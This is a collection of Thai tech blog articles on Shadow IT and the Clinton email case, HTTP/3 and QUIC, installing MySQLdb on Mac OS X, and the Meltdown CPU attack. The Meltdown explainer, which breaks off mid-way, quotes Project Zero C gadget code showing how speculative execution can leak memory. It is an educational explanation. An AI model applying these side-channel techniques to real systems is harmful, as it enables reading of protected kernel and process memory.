เป็นเรื่องที่องค์กรหลายแห่งต้องเจอ และอาจจะคุ้นชินไปแล้วในปัจจุบัน รวมไปถึงการพัฒนาด้านซอฟต์แวร์บริหารอุปกรณ์เคลื่อนที่ (MDM: Mobile Device Management) ที่ดีขึ้นมาก ก็ทำให้องค์กรต่างๆ สามารถจัดการกับข้อมูลบนเครื่องส่วนตัวพนักงานเหล่านี้ได้ อย่างไรก็ตาม กรณีของ Clinton มีความแตกต่างออกไปจากปกติ เพราะมีการตั้งอีเมลเซิร์ฟเวอร์ของตัวเองขึ้นมาต่างหาก โดยจ้างเจ้าหน้าที่ของกระทรวงการต่างประเทศสหรัฐฯ เป็นการนอกเวลา เพื่อให้ติดตั้งระบบดังกล่าว โดยเธอระบุเมื่อการแถลงข่าวตอนสิ้นปีที่แล้วว่า ทำไปเพราะ “ความสะดวก” ในการทำงาน และบอกว่าระบบของเธอมีความปลอดภัย และได้รับการดูแลจากหน่วยงานรักษาความปลอดภัยและความลับของสหรัฐ (USSS: United States Secret Services) กรณีดังกล่าวนี้ทำให้เกิดกระแสวิจารณ์เป็นวงกว้างจากสาธารณะและผู้เชี่ยวชาญ ถึงการใช้อีเมลส่วนตัวที่ไม่ได้ความปลอดภัยตามเกณฑ์ที่รัฐบาลกำหนด แต่ที่สำคัญที่สุดคือการออกรายงานถึงสภาคองเกรสโดยผู้ตรวจการของกระทรวงการต่างประเทศของสหรัฐฯ ที่ระบุว่า [Clinton ละเมิดกฎของรัฐบาลกลาง](https://www.blognone.com/node/81426) ซึ่งรวมไปถึงการสื่อสารอื่นๆ ที่ไม่จำกัดแต่เพียงอีเมลเท่านั้น แต่ยังมีทั้ง[การสนทนาทางโทรศัพท์หรือส่งเอกสารผ่านโทรสารแบบไม่ปลอดภัย](https://www.blognone.com/node/80975)ด้วย ที่เรื่อง Clinton เป็นเรื่องใหญ่มากในอเมริกา ส่วนหนึ่งมีประเด็นเรื่องของการเลือกตั้งประธานาธิบดีเข้ามาเกี่ยว (ที่หลายคนมองว่าเรื่องนี้เป็น “เผือกร้อน” สำหรับเธอ ที่มาได้ไม่ถูกจังหวะ) แต่เรื่องสำคัญกว่านั้นคือข้อมูลนโยบายทางการทูตที่สำคัญ ขณะเธอเป็นรัฐมนตรีนั้น ตกอยู่ในความเสี่ยงด้านความปลอดภัย แม้เธอจะออกมาระบุว่า ยินดีที่จะเปิดเผยข้อมูลข้อมูลดังกล่าวต่อสาธารณะเพราะเธอเชื่อว่าไม่ได้ใช้ติดต่อเรื่องสำคัญ (ซึ่งในบางกรณีก็ไม่จริง เพราะมีคำสั่งขอให้ศาลดึงเอาข้อมูลอ่อนไหวบางอย่างออกไปจากการเปิดเผย) **Shadow IT ปัญหาที่เกิดขึ้นได้กับทุกที่ทุกองค์กร** กรณีของ Clinton นั้นแม้จะเป็นกรณีซึ่งโด่งดัง (ส่วนหนึ่งเพราะคนทำเป็นนักการเมืองที่มีคนรู้จักในสหรัฐอเมริกา) แต่สิ่งที่ต้องตระหนักคือ เรื่องเหล่านี้เกิดขึ้นได้กับ_ทุกองค์กร_ใน_ทุกที่_ ไม่จำเป็นว่าต้องเป็นหน่วยงานภาครัฐเสมอไป แม้เราจะเห็นตัวอย่างจากภาคเอกชนน้อยกว่าที่อื่นๆ (จากประสบการณ์ส่วนตัว การติดต่อหน่วยงานราชการบางแห่งยังคงใช้อีเมลภายนอกองค์กร ติดต่อเรื่องสำคัญ) สภาพการสร้างโครงสร้างไอทีที่ไม่ได้รับอนุญาตหรือระบบที่ใช้งานกันอย่างลับๆ ในองค์กรดังกล่าว มีภาษาที่เรียกกันอย่างเป็นทางการว่า “Shadow IT” หรือ “ระบบไอทีเงา” ซึ่งมักจะเป็นการใช้ระบบไอทีภายนอก โดยที่บริษัทหรือฝ่ายไอทีขององค์กรไม่รู้ ตัวอย่างที่ง่ายที่สุดคือการติดตั้ง Wi-Fi Access Point ของตัวเอง ซึ่งอาจจะใช้มาตรฐานการรักษาความปลอดภัยไม่ตรงกันองค์กร (เช่น องค์กรบังคับใช้ WPA 2 + RADIUS แต่ access point ตัวนั้นอาจจะใช้แค่ WEP) หรือการใช้แอพส่งข้อความทันใจติดต่อเรื่องงาน แทนที่จะเป็นระบบงานซึ่งองค์กรกำหนดมาให้ใช้งานเอง ปัญหา Shadow IT ลักษณะนี้เกิดขึ้นได้จากสองปัจจัย ปัจจัยแบบแรกคือการที่ผู้บริหารหรือเจ้าหน้าที่ต้องการระบบที่ใช้งานได้ง่ายและไม่ยุ่งยาก อาการแบบนี้มักจะเกิดกับผู้บริหารในองค์กร ซึ่งเคยชินกับวิธีที่ตัวเองต้องทำงาน และฝ่ายปฏิบัติมักยากที่จะปฏิเสธ (ว่าง่ายๆ คือไม่อยากขัดใจเจ้านาย เพราะอาจด้วยการกลัวถูกปลด ไม่ได้ขึ้นเงินเดือน หรือแม้กระทั่งไม่ได้งบประมาณในปีถัดไป) ส่วนอีกปัจจัยคือระบบไอทีองค์กรนั้นไม่เอื้อให้กับการคิดค้นหรือการพัฒนา ตัวอย่างเช่น องค์กรอาจจะอนุมัติให้พนักงานใช้เทคโนโลยีชุดเก่า แต่ระบบใหม่ที่ดีกว่ายังไม่ได้รับการอนุมัติ ทำให้พนักงานตัดสินใจเปิด “ทางลัด” ใช้บริการเหล่านี้อย่างลับๆ โดยไม่ได้รับอนุญาตจากฝ่ายไอทีองค์กร จากตัวเลข[ผลการสำรวจของ RSA เมื่อปี 2007](https://drive.google.com/file/d/0Bzq_pqQEmApNaHVhZmhaNkV3d28/view?usp=sharing) ก็พบว่าลักษณะของการใช้ช่องทางที่ไม่ได้รับอนุมัติจากองค์กรในการสื่อสารนั้นมีอยู่สูงมาก ตัวอย่างเช่นในองค์กรขนาดใหญ่ มีคนที่ส่งข้อมูลจากหน่วยงานเข้าอีเมลส่วนตัวเพื่อเอาไปทำงานต่อที่บ้านอยู่ที่ 61% (นับรวมทั้งทำประจำและทำในบางครั้ง) ตัวเลขผลสำรวจนี้บอกอย่างชัดเจนว่า ในหลายครั้งพนักงานเองก็เลือกจะมองข้ามความปลอดภัยและระบบงานขององค์กรที่มีการป้องกันความลับหรือข้อมูลรั่วไหล เพื่อเน้นไปที่ความสะดวกเป็นหลัก **ข้อดีและข้อเสียของ Shadow IT** คำถามที่ตามมาก็คือ แล้วตกลง Shadow IT มีข้อดีและข้อเสียอย่างไรบ้าง? หากพิจารณาข้อเสีย สิ่งแรกที่เราเห็นได้อย่างชัดเจนคือข้อมูลที่เป็นความลับบางอย่าง มีสิทธิรั่วไหลไปยังบุคคลภายนอกได้ ตัวอย่างเช่นหากบุคลากรทางการแพทย์ตัดสินใจส่งเวชระเบียนอิเล็กทรอนิกส์ (EMR: Electronic Medical Record) เข้าอีเมลของตัวเอง ข้อมูลของคนไข้ก็มีสิทธิถูกอ่าน ไม่ก็ถูกเก็บไว้กับคนอื่น ละเมิดทั้งข้อมูลส่วนตัวและความลับของคนไข้ สิ่งต่อมาที่เห็นได้ชัดคือ ต่อให้ระบบที่พนักงานคนนั้นใช้จะมีความปลอดภัยมาก แต่ก็ไม่มีอะไรรับรองได้ว่า ข้อมูลเหล่านั้นจะถูกจัดการตามมาตรฐานองค์กร (มั่นใจได้อย่างไรว่าการเข้ารหัสที่ใช้ได้มาตรฐาน? หลังพนักงานพ้นสภาพ ข้อมูลชุดนั้นจะถูกจัดการอย่างไร ฯลฯ) และสุดท้ายคือการเปิดช่องโหว่ให้กับระบบไอทีขององค์กร โดยเฉพาะอย่างยิ่งในกรณีที่เป็นอุปกรณ์หรือสายฮาร์ดแวร์อย่างเช่นหากติดตั้ง Access Point เองแล้วเกิดทำระบบการเข้ารหัสต่ำ ย่อมเป็นช่องทางทำให้เกิดการโจมตีเครือข่ายขององค์กรได้ง่ายมาก อย่างไรก็ตาม Shadow IT ก็มีส่วนที่ทำให้เกิดแนวทางในการทำงานแบบใหม่ๆ ในองค์กร ซึ่งทำให้การติดต่อประสานงานดีขึ้น และอาจสร้างแนวทางใหม่ๆ ให้กับองค์กรได้ ตัวอย่างเช่น การใช้งานระบบติดต่อสื่อสารงานใหม่ๆ อย่างเช่นบริการแนว Slack ก็เป็นหนึ่งในช่องทางที่ทำให้องค์กรทำงานได้สะดวกขึ้น และอาจเริ่มต้นจากแผนกเล็กๆ ที่ไม่ชอบการติดต่อประสานในแบบเดิมๆ นั่นเอง (ในบ้านเราก็เป็นการใช้ LINE คุยงานกัน) **แนวทางในการแก้ไขปัญหา** การแก้ไขปัญหาเรื่องของ Shadow IT ไม่ใช่เรื่องง่ายและไม่ใช่เรื่องที่ยาก ที่กล่าวเช่นนี้เพราะ Shadow IT มักจะสังเกตได้ไม่ชัดเจนนัก ยกเว้นจะต้องติดตามระบบต่างๆ อย่างใกล้ชิด (ซึ่งก็ทำได้ยากมาก ในกรณีของอีเมลก็คงไม่มีใครไปนั่ง monitor อีเมลที่ส่งออกจากบริษัทเป็นรายฉบับ) ซึ่งทำให้มันเป็นเรื่องยาก แต่เมื่อรู้ปัญหาแล้ว ฝ่ายบริหารไอทีที่เกี่ยวข้องก็ควรเข้าไปรีบแก้ไขปัญหา แนวทางหนึ่งที่ Russ Banham ผู้สื่อข่าวสายธุรกิจ [เสนอแนวทาง](http://www.forbes.com/sites/centurylink/2015/05/04/why-cios-should-be-happy-about-shadow-it/#2b0cd92b39c4)เอาไว้คือการที่ผู้บริหารฝ่ายไอทีจะต้องเข้าไปพูดคุย ทำความเข้าใจกับฝ่ายที่ใช้เทคโนโลยีซึ่งไม่ได้รับอนุญาตจากองค์กร พร้อมกับหาทางออกร่วมกันว่าจะทำอย่างไรให้เทคโนโลยีในองค์กร ตอบสนองความต้องการได้ (ว่าง่ายๆ คือดึงเข้ามาอยู่ในการดูแลให้ได้) ส่วน Andrew Froehlich ประธานฝ่ายสถาปัตยกรรมเครือข่ายของ West Gate Networks [เสนอ](http://www.informationweek.com/strategic-cio/it-strategy/shadow-it-8-ways-to-cope/d/d-id/1319535)ว่าระบบไอทีและนโยบายขององค์กรจะต้องยืดหยุ่นและพร้อมปรับตัวเข้ากับเทคโนโลยีใหม่ๆ แต่ยังต้องยืนยันในกฎระเบียบและข้อห้ามต่างๆ อย่างเคร่งครัดและชัดเจนเอาไว้ รวมถึงฝ่ายไอทีต้องทำงานกับแผนกอื่นๆ ให้มากขึ้น เพื่อตัดปัญหาการสร้าง Shadow IT ในองค์กร ส่วนในกรณีที่จำเป็นจริงๆ (เช่น ระบบภายในล่ม) อาจจะอนุมัติให้มีได้ แต่ต้องให้สั้นที่สุดและมีแนวทางในการจัดการที่ชัดเจน อย่างไรก็ตาม ในปัจจุบันหลายบริษัทอย่างเช่น Cisco หรือ NTT Communications ก็มีผลิตภัณฑ์ที่ช่วยจัดการกับการรั่วไหลข้อมูล รวมถึงวิเคราะห์ความเสี่ยงของ Shadow IT ภายในองค์กรจากการใช้งานระบบไอทีในองค์กรด้วย **บทสรุป: จะแก้ Shadow IT ได้ ต้องมีแนวทางที่ชัดเจน** ปัญหาของ Shadow IT ภายในองค์กร ถือเป็นเรื่องที่มีความสำคัญในเชิงของการบริหารองค์กร โดยเฉพาะอย่างยิ่งกับข้อมูลที่อ่อนไหวหรือเป็นความลับกับองค์กร ซึ่งไม่ใช่จะเกิดเฉพาะกับกรณีสำคัญๆ (high-profile case) อย่างที่ได้ยกตัวอย่างไปในตอนต้นเท่านั้น แต่เกิดขึ้นได้กับทุกหน่วยงานไม่ว่าจะใหญ่หรือเล็ก สิ่งสำคัญที่จะช่วยแก้ไขปัญหา Shadow IT ในองค์กรได้ นอกจากจะต้องปรับนโยบายและเปลี่ยนแนวทางให้ยืดหยุ่นกว่าเดิมแล้ว ยังจะต้องมีการสร้างความเข้าใจให้กับทั้งองค์กร เพื่อลดความเสี่ยงที่จะเกิดสถานการณ์แบบนี้ทั้งในปัจจุบันและอนาคต ไม่เช่นนั้นเราอาจจะได้เห็นกรณีลักษณะเดียวกับของ Clinton ไปเรื่อยๆ อีกในอนาคต
# อธิบายโพรโทคอล HTTP/3 แตกต่างจาก HTTP/1, HTTP/2, SPDY, QUIC อย่างไร ข่าวเทคนิคที่น่าสนใจในช่วงไม่นานนี้คือ [Cloudflare, Chrome, Firefox ร่วมมือกันรองรับ HTTP/3](https://www.blognone.com/node/112209) หรือที่เราเคยรู้จักกันในชื่อ [QUIC ที่กูเกิลเคยเสนอมาตั้งแต่ปี 2015](https://www.blognone.com/node/67730) หลายคนอาจสงสัยว่าแล้ว HTTP/1, HTTP/2 (หรือ SPDY) และ HTTP/3 (QUIC) แตกต่างกันอย่างไร บทความนี้จะอธิบายวิวัฒนาการของเทคโนโลยี HTTP ให้เข้าใจกันแบบง่ายๆ ครับ ### HTTP/1.0 โพรโทคอล HTTP/1.0 เกิดมาในยุคแรกๆ ของเว็บที่สร้างโดย Tim Berners-Lee และเพื่อนร่วมงานอีกจำนวนหนึ่ง โดยออกเป็นสเปกกลางในปี 1996 ซึ่งถือเป็นจุดเริ่มต้นของ HTTP ในปัจจุบัน หลักการสำคัญของ HTTP คือเป็นการกำหนดวิธีการสื่อสารระหว่างเซิร์ฟเวอร์กับไคลเอนต์ ว่าจะส่งข้อมูลกันอย่างไร โดยเป็นการสื่อสารอยู่บนชั้นของโพรโทคอลเครือข่าย TCP อีกทีหนึ่ง HTTP ยุคแรกเป็นการสื่อสารแบบไม่เข้ารหัส (unencrypted) โดยหลังจากนั้นไม่นานก็มีทีมงานของ Netscape สร้างโพรโทคอลสื่อสารแบบเข้ารหัส Secure Sockets Layer หรือ SSL ขึ้นมาใช้งานคู่กัน ซึ่งปัจจุบันมันเปลี่ยนชื่อเป็น Transport Layer Security (TLS) มาตั้งแต่ปี 1999 ภาพด้านล่างคือวิธีการทำงานของ HTTP/1.0 แบบเข้ารหัสด้วย TLS ซึ่งเราจะเห็นว่ากว่าสองฝั่งจะเจรจาเพื่อส่งข้อมูลกันสำเร็จ มีกระบวนการที่ "เยอะ" มากก่อนเริ่มส่งตัวข้อมูลจริงๆ (HTTP Response) ### HTTP/1.1 ขั้นตอนการเจรจา (handshake) ที่เรื่องมากนี้ถูกเรียกว่า slow start เป็นผลให้ HTTP ทำงานช้ากว่าที่ควรจะเป็น ในปี 1997 จึงมีการพัฒนาโพรโทคอลเวอร์ชัน HTTP/1.1 ที่แก้ปัญหานี้ไป (บางส่วน) ของใหม่ที่เพิ่มมาใน HTTP/1.1 คือเทคนิค "keep alive" (บ้างก็เรียก persistent connection) หรือการเปิดช่องทางการสื่อสารระหว่างไคลเอนต์กับเซิร์ฟเวอร์ทิ้งไว้หลังส่งข้อมูลเสร็จแล้ว เพื่อว่าหากมีการเรียกข้อมูลซ้ำอีกครั้ง (เช่น กดเปลี่ยนหน้าเพจหรือรีโหลดเพจ) จะได้ส่งข้อมูลผ่านท่อเดิม โดยไม่ต้องมาเริ่มเจรจากันใหม่อีกครั้ง ### HTTP/2 HTTP/1.1 อยู่กับเรามานานถึง 18 ปี วงการเว็บพัฒนาไปจากเดิมมาก สิ่งสำคัญคือ HTTP/1.1 เกิดขึ้นในยุคที่เว็บเพจมีขนาดเล็กเพียงไม่กี่กิโลไบต์ มีรูปภาพเพียงเล็กน้อย แต่เว็บในช่วงหลังเพิ่มไฟล์ประเภทใหม่ๆ เข้ามาอีกหลายอย่าง ทั้งรูปภาพที่มีจำนวนและขนาดเยอะขึ้น, ไฟล์ประเภท CSS และ JavaScript ที่มักมีอีกหลายไฟล์ จำนวนไฟล์ที่มากขึ้นทำให้การส่งข้อมูลจากเซิร์ฟเวอร์มายังไคลเอนต์ แต่โพรโทคอล HTTP/1.1 อนุญาตให้เราส่งข้อมูลได้ครั้งละ 1 ไฟล์เท่านั้น การดาวน์โหลดจึงต้องต่อคิวกันเพื่อให้ดาวน์โหลดไฟล์ได้ครบตามต้องการ เบราว์เซอร์จึงแก้ปัญหาด้วยการเปิดการเชื่อมต่อพร้อมกันหลายๆ อันเพื่อดาวน์โหลดไฟล์ขนานกันไป ซึ่งก็มีข้อเสียคือต้องมีกระบวนการเจรจาเริ่มส่งข้อมูลกันทุกครั้งไป ไม่ได้ใช้ประโยชน์จากการเปิดท่อค้างไว้ (keep-alive) อย่างที่ควรจะเป็น ปัญหานี้ถูกแก้ไขในอีกสิบกว่าปีให้หลัง โดย[กูเกิลเสนอโพรโทคอลชื่อ SPDY ในปี 2009](https://www.blognone.com/news/21948/%E0%B8%81%E0%B8%B9%E0%B9%80%E0%B8%81%E0%B8%B4%E0%B8%A5%E0%B9%83%E0%B8%8A%E0%B9%89%E0%B9%82%E0%B8%9E%E0%B8%A3%E0%B9%82%E0%B8%95%E0%B8%84%E0%B8%AD%E0%B8%A5-spdy-%E0%B9%81%E0%B8%97%E0%B8%99-http-%E0%B8%81%E0%B8%A7%E0%B9%88%E0%B8%B2-90-%E0%B9%81%E0%B8%A5%E0%B9%89%E0%B8%A7) (อ่านว่า สปีดดี้) โดยมีเว็บเบราว์เซอร์รายอื่นเข้าร่วมสนับสนุนมากขึ้นเรื่อยๆ และ[ภายหลังก็ผลักดันเป็นมาตรฐาน HTTP/2 ในปี 2012](https://www.blognone.com/node/36688) และ [ทำสำเร็จในปี 2015](https://www.blognone.com/node/68487) หลักการสำคัญของ SPDY หรือ HTTP/2 คือการยอมให้การเชื่อมต่อผ่าน HTTP หนึ่งท่อ สามารถส่งไฟล์ได้พร้อมกันหลายไฟล์ (ชื่อทางเทคนิคเรียกว่า stream หรือกระแสน้ำ) ช่วยให้เราเปิดการเชื่อมต่อ HTTP เพียงครั้งเดียวแล้วสบายไปตลอด ### HTTP/3 มาตรฐาน HTTP/2 ดูจะแก้ปัญหาสำคัญของการส่งข้อมูลผ่าน HTTP ไปทั้งหมดแล้ว แต่ก็ยังมีข้อจำกัดอยู่ที่ระดับเลเยอร์ต่ำลงไป นั่นคือการส่งข้อมูลแบบ TCP (Transmission Control Protocol) สมาชิก Blognone ที่เคยเรียนวิชาด้านเน็ตเวิร์คมาบ้าง คงพอทราบความแตกต่างของ TCP และ UDP (User Datagram Protocol) ถึงเรื่องความน่าเชื่อถือ (reliability) ของวิธีการส่งข้อมูลทั้งสองแบบ - TCP น่าเชื่อถือกว่า ข้อมูลไม่หาย แต่ช้ากว่า เพราะต้องยืนยันข้อมูลกลับไปยังต้นทางว่าได้ข้อมูลครบ - UDP กลับกันคือไม่มีกระบวนการยืนยันข้อมูลกลับไปยังต้นทาง ทำให้การเชื่อมต่อเร็วกว่ามาก อย่างที่เขียนไปข้างต้นว่าเว็บยุคหลังมีชนิดของข้อมูลเพิ่มขึ้นจากในอดีตมาก เช่น รูปภาพ คลิปวิดีโอ ฯลฯ แต่เมื่อเราส่งทุกอย่างผ่านโพรโทคอล TCP เหมือนกัน อาจไม่ตอบโจทย์ของข้อมูลต่างชนิดกัน (เช่น ข้อมูลประเภทวิดีโออาจยอมให้สูญเสียข้อมูลได้บ้าง) ในปี 2015 กูเกิล (อีกแล้ว) จึงเสนอโพรโทคอลใหม่ชื่อ QUIC (อ่านว่า "ควิก") ซึ่งเป็นการตั้งชื่อล้อกับ SPDY นั่นเอง ชื่อ QUIC ย่อมาจาก Quick UDP Internet Connections ซึ่งจากชื่อเต็มคงพอนึกออกว่ามันเปลี่ยนมาใช้ UDP ช่วยส่งข้อมูลแทน TCP นอกจากนั้น QUIC ยังปรับแก้ปัญหาเรื่องกระบวนการ handshake ที่ล่าช้าของ HTTP (โดยเฉพาะถ้ารวมการเข้ารหัส TLS อีกชั้น) ด้วยการออกแบบกระบวนการ handshake ใหม่ให้รวม TLS 1.3 มาด้วยเลย (แปลว่า QUIC เข้ารหัสทุกกรณีเสมอ) ผลคือ QUIC ทำงานได้รวดเร็วขึ้นทั้งในขั้นตอนเจรจา (handshake) และการส่งตัวข้อมูลจริงๆ QUIC ถูกเสนอเข้าเป็นมาตรฐาน HTTP/3 [ในที่ประชุมของ IETF ซึ่งวนมาจัดที่กรุงเทพเมื่อเดือนพฤศจิกายน 2018](https://www.blognone.com/node/106406) ซึ่งก็สามารถพูดได้เต็มปากว่า **HTTP/3 เกิดขึ้นที่กรุงเทพ** (สถานที่จัดงานแบบเจาะจงคือ Marriott Marquis Queen’s Park ข้างสวนเบญจกิติ) สถานะของ HTTP/3 ในโลกจริงยังถือว่าเพิ่งเริ่มต้น ขณะที่เขียนบทความนี้ - Chrome รองรับแล้วที่เวอร์ชัน Canary - Firefox Nightly จะเริ่มรองรับช่วงปลายปี 2019 นี้ - curl เพิ่งรองรับในฐานะฟีเจอร์ทดลอง (experimental) ต้องดาวน์โหลด curl เวอร์ชันล่าสุดจาก GitHub มาเอง - ฝั่งเซิร์ฟเวอร์ Cloudflare รองรับผ่านซอฟต์แวร์ที่เขียนเองชื่อ [Quiche](https://blog.cloudflare.com/enjoy-a-slice-of-quic-and-rust/) - Nginx เพิ่งประกาศวางแผนรองรับ HTTP/3 [เมื่อเดือน พ.ค. 2019](https://www.nginx.com/blog/nginx-1-16-1-17-released/)
# MySQL + Python on Mac OS X ปกติแล้ว python ที่ติดมากับ Mac OS X จะไม่มี module สำหรับติดต่อกับ MySQL database ทำให้เวลาที่ต้องการจะใช้งานผ่านทาง python ต้องติดตั้ง [module MySQLdb](http://mysql-python.sourceforge.net/) เสียก่อน วิธีติดตั้งคือ - ไปโหลด source module มาก่อนที่ [http://sourceforge.net/projects/mysql-python/](http://sourceforge.net/projects/mysql-python/) อันที่โหลดมาเป็นเวอร์ชัน 1.2.2 - untar ออกมาจะได้ source อยู่ในไดเรกทอรีนึง - ถ้าไม่มี mysql_config อยู่ใน PATH ก็แก้ไฟล์ setup_posix.py จากที่ว่า > mysql_config.path = "mysql_config" > แก้เป็น > mysql_config.path = "/path/to/your/mysql_config" > - สั่ง build ด้วยคำสั่ง > $ python setup.py build > - install module ด้วยคำสั่ง > $ python setup.py install > - เวลาเรียกใช้งานก็ import เข้ามาตามปกติ > Python 2.3.5 (#1, Jan 13 2006, 20:13:11) [GCC 4.0.1 (Apple Computer, Inc. build 5250)] on darwin Type "help", "copyright", "credits" or "license" for more information. >>> import MySQLdb >
# รู้จักการโจมตี Meltdown เมื่อการเร่งความเร็วซีพียูเปิดทางให้แฮกเกอร์เจาะระบบ การโจมตี Meltdown ที่เริ่มมีรายงานในสัปดาห์นี้เปิดทางให้แฮกเกอร์ที่สามารถรันโปรแกรมบนเครื่องของเหยื่อ สามารถอ่านข้อมูลบนหน่วยความจำได้ทั้งหมด แม้จะไม่มีสิทธิ์อ่านหน่วยความจำส่วนนั้นๆ เช่น หน่วยความจำของเคอร์เนล และโปรเซสอื่นๆ ### Speculative Execution กระบวนการโจมตี Meltdown อาศัยเทคนิคการออกแบบซีพียูเพื่อให้ทำงานได้เร็วขึ้นที่ชื่อว่า speculative execution เป็นการรันคำสั่งถัดไปทันที แม้ว่าตามโปรแกรมแล้วจะต้องรอเงื่อนไขก่อนหน้า โดยลองดูจากโค้ดตัวอย่างของ Project Zero ```c struct array { unsigned long length; unsigned char data[]; }; struct array *arr1 = ...; unsigned long untrusted_offset_from_caller = ...; if (untrusted_offset_from_caller < arr1->length) { unsigned char value = arr1->data[untrusted_offset_from_caller]; ... } ``` ขณะที่โค้ดอ่านค่าตัวแปร `untrusted_offset_from_caller` ในบรรทัดที่ 6 ก่อนจะตรวจสอบเงื่อนไข if ในบรรทัดที่ 7 ในซีพียูยุคใหม่ บรรทัดที่ 8 ที่เป็นการอ่านค่าจากหน่วยความจำจะเริ่มทำงานไปทันทีโดยไม่สนใจว่าการตรวจสอบเงื่อนไข if เป็นจริงหรือไม่ ที่ผู้ออกแบบซีพียูออกแบบให้ทำเช่นนี้ เป็นการเตรียมข้อมูลมาไว้ล่วงหน้า เนื่องจากการเรียกข้อมูลจากหน่วยความจำอาจใช้เวลานาน (ประมาณ 400-500 CPU cycle) หากเงื่อนไข if ไม่เป็นจริง ซีพียูจะล้างข้อมูลออกเหมือนไม่เคยเกิดขึ้น ตัวโปรแกรมจะไม่เคยรับรู้ว่ามีการอ่านค่าในหน่วยความจำขึ้นมาแล้วและไม่สามารถเขียนโค้ดใดๆ เพื่อพิจารณาค่าในหน่วยความจำที่ซีพียูล้างออกไปนั้นได้ กระบวนการเช่นนี้ทำให้ซีพียูสามารถทำงานได้เต็มที่ขึ้นอย่างมาก ประสิทธิภาพรวมโดยรวมสูงขึ้นระดับ 10% ขึ้นไป มันเป็นเทคนิคที่ใช้งานกันมาเป็นเวลานาน และมีอธิบายอยู่ในหนังสือเรียนสถาปัตยกรรมคอมพิวเตอร์ใหม่ๆ ### การโจมตี FLUSH+RELOAD เมื่อปี 2014 Yuval Yarom และ Katrina Falkner นักวิจัยจากมหาวิทยาลัย Adelaide นำเสนอการ[โจมตีที่ชื่อว่า FLUSH+RELOAD](https://www.usenix.org/node/184416) ที่เปิดให้โปรเซสของแฮกเกอร์ที่รันบนเครื่องเดียวกับเหยื่อ สามารถอ่านพฤติกรรมและคาดเดาข้อมูลในโปรเซสของเหยื่อได้ โดยสาธิตการอ่านกุญแจ PGP ออกมาจากโปรแกรม GnuPG ที่กำลังเซ็นเอกสารอยู่ การโจมตี FLUSH+RELOAD อาศัยพฤติกรรมของระบบปฎิบัติการยุคใหม่ ที่หากโปรแกรมมีการเรียกใช้ไบนารีเดียวกัน เช่น ไลบรารีเดียวกันหรือไบนารีของตัวโปรแกรมเดียวกัน (แม้จะเรียกใช้โดยผู้ใช้คนละคนที่ไม่มีสิทธิ์อ่านข้อมูลข้ามกัน) ตัวระบบปฎิบัติการก็จะโหลดไบนารีนั้นๆ ขึ้นไปยังหน่วยความจำเพียงครั้งเดียว และแชร์ร่วมกันระหว่างผู้ใช้ทั้งหมด เพื่อประหยัดหน่วยความจำ และทำให้กระบวนการโหลดโปรแกรมโดยทั่วไปเร็วขึ้น นอกจากพฤติกรรมของระบบปฎิบัติการ FLUSH+RELOAD ยังอาศัยคำสั่ง [CLFLUSH](https://hjlebbink.github.io/x86doc/html/CLFLUSH.html) (Flush Cache Line) ที่โปรแกรมสามารถสั่งยกเลิกแคชของหน่วยความจำตำแหน่งใดๆ ได้ ทำให้เมื่อโปรเซสอื่นต้องการใช้หน่วยความจำตำแหน่งเดียวกัน ต้องโหลดใหม่จากหน่วยความจำ กระบวนการโจมตีของ FLUSH+RELOAD คือการสั่ง CLFLUSH หน่วยความจำที่เป็นโค้ดที่เหยื่อกำลังจะรันออกจากแคชทั้งหมด แล้วทดสอบอ่านหน่วยความจำตำแหน่งนั้นอีกครั้งภายหลัง หากอ่านได้เร็วแสดงว่าเหยื่อเคยรันโค้ดในส่วนนั้นมาแล้ว ภาพตัวอย่างจากรายงาน FLUSH+RELOAD ภาพ (A) เริ่มต้นด้วยแฮกเกอร์ล้างโค้ดส่วนที่ต้องการดูว่าเหยื่อเรียกหรือไม่ออกจากแคช หลังจากช่วงเวลาหนึ่งแฮกเกอร์ก็เรียกหน่วยความจำส่วนนั้นด้วยตัวเอง เมื่อใช้เวลานาน (สีส้ม) จึงรู้ได้ว่าเหยื่อไม่เคยรันโค้ดส่วนนั้นในช่วงเวลาที่รอ ภาพ (B) แสดงถึงกรณีที่เหยื่อรันโค้ดส่วนนั้น เมื่อแฮกเกอร์เรียกอ่านหน่วยความจำก็จะอ่านได้เร็วเพราะโค้ดอยู่ในแคชอยู่แล้ว แม้ว่า FLUSH+RELOAD จะน่าสนใจ แต่กระบวนการโจมตียังจำกัด แฮกเกอร์ต้องเข้าใจพฤติกรรมของโปรแกรมอย่างชัดเจนเพื่อหาพฤติกรรมที่ต้องการ โดยไม่สามารถไปอ่านหน่วยความจำของเหยื่อได้โดยตรง ซีพียูเอเอ็มดีไม่ได้รับผลกระทบจากการโจมตี FLUSH+RELOAD เนื่องจากพฤติกรรมของคำสั่ง CLFLUSH บนชิปเอเอ็มดีนั้นต่างออกไป แม้จะล้างแคชออกจาก L1 ไปแล้วแต่ก็ไม่ได้ล้างออกจาก L2/L3 ทำให้การสังเกตระยะเวลาแคชทำได้ยากกว่า ### การโจมตี Meltdown การโจมตี Meltdown มุ่งไปที่การอ่านหน่วยความจำที่โปรเซสไม่ได้รับอนุญาต เช่นหน่วยความจำของเคอร์เนล ที่ปกติแล้วหากโปรแกรมพยายามอ่านหน่วยความจำในตำแหน่งเหล่านั้น ระบบปฎิบัติการจะปิดการทำงานของโปรแกรมทันที อย่างไรก็ดี ในระดับของซีพียูแล้ว เมื่อมีการอ้างอิงข้อมูลในหน่วยความจำตัวซีพียูจะพยายามอ่านข้อมูลเหล่านั้นมารอไว้ โดยไม่สนใจว่าตัวโปรเซสมีสิทธิ์อ่านข้อมูลเหล่านั้นจริงหรือไม่ เพราะถ้าอ่านไม่ได้จริงก่อนตัวโปรแกรมจะดึงค่าไปใช้งานได้ ระบบปฎิบัติการก็จะปิดโปรแกรมก่อนอยู่ดี Meltdown อาศัยพฤติกรรมนี้ด้วยการสร้างโค้ดที่**โหลดหน่วยความจำโดยอาศัยข้อมูลในตำแหน่งที่ไม่มีสิทธิ์อ่าน** เพื่อสร้างกระบวนการส่งข้อมูลออกไปภายนอกโปรเซสที่พยายามอ่านข้อมูลนั้น ดูโค้ดตัวอย่างจาก Project Zero โค้ดที่สอง ต่อไปนี้ ```c struct array { unsigned long length; unsigned char data[]; }; struct array *arr1 = ...; /* small array */ struct array *arr2 = ...; /* array of size 0x400 */ /* >0x400 (OUT OF BOUNDS!) */ unsigned long untrusted_offset_from_caller = ...; if (untrusted_offset_from_caller < arr1->length) { unsigned char value = arr1->data[untrusted_offset_from_caller]; unsigned long index2 = ((value&1)*0x100)+0x200; if (index2 < arr2->length) { unsigned char value2 = arr2->data[index2]; } } ``` 